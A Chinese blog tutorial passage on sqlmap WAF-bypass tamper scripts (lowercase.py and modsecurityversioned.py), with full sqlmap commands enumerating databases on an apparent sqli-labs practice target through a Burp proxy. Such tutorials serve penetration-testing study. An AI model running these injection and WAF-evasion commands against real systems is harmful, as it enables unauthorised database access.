zoukankan      html  css  js  c++  java
  • sqlmap从入门到精通-第七章-7-12 绕过WAF脚本-lowercase.py&modsecurityversioned.py

    24. lowercase.py脚本

    将攻击的payload从大写转换为小写,适用于所有的数据库

    实战演示:

    测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="lowercase.py" --proxy="http://127.0.0.1:8080" -batch

     

    发现是可以注入的,burp抓包情况如下:

     

    都变成小写了

    ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

    25. modsecurityversioned.py脚本

    使用注释的方式围住完整的查询条件,主要是用于绕过ModSecuriy这个开源的WAF, 适用于Mysql数据库

    实战演示:

    测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="modsecurityversioned.py" --proxy="http://127.0.0.1:8080" -batch

     burp抓包没看到效果,用的比较少

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    点子
    evil idea
    ubuntu 10.04.3 modify source.list
    点子
    ubuntu常用软件安装
    架构技术介绍网站
    点子
    点子
    【转发】上海地区工作,全国找网络底层技术开发大牛,旅游方面的创业项目。
    文本相似度计算余弦定理和广义Jaccard系数
  • 原文地址:https://www.cnblogs.com/autopwn/p/13533620.html
Copyright © 2011-2022 走看看